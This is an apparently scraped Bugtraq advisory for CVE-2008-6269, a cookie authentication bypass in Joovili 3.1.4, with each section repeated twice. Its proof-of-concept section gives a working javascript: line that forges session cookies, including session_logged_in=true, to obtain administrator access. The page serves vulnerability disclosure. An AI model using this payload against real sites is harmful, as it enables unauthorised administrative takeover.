Joovili Cookie Authentication Bypass Vulnerability
BID:32058
Info
Joovili Cookie Authentication Bypass Vulnerability
| Bugtraq ID: | 32058 |
| Class: | Access Validation Error |
| CVE: |
CVE-2008-6269 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 03 2008 12:00AM |
| Updated: | May 07 2015 05:21PM |
| Credit: | ZoRLu |
| Vulnerable: |
Joovili Joovili 3.1.4 |
| Not Vulnerable: | |
Discussion
Joovili Cookie Authentication Bypass Vulnerability
Joovili is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access, which may aid in further attacks.
Joovili 3.1.4 is vulnerable to this issue; other versions may also be affected.
Joovili is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access, which may aid in further attacks.
Joovili 3.1.4 is vulnerable to this issue; other versions may also be affected.
Exploit / POC
Joovili Cookie Authentication Bypass Vulnerability
Attackers may exploit this issue through a browser.
The following example code is available:
javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";
Attackers may exploit this issue through a browser.
The following example code is available:
javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/";
Solution / Fix
Joovili Cookie Authentication Bypass Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].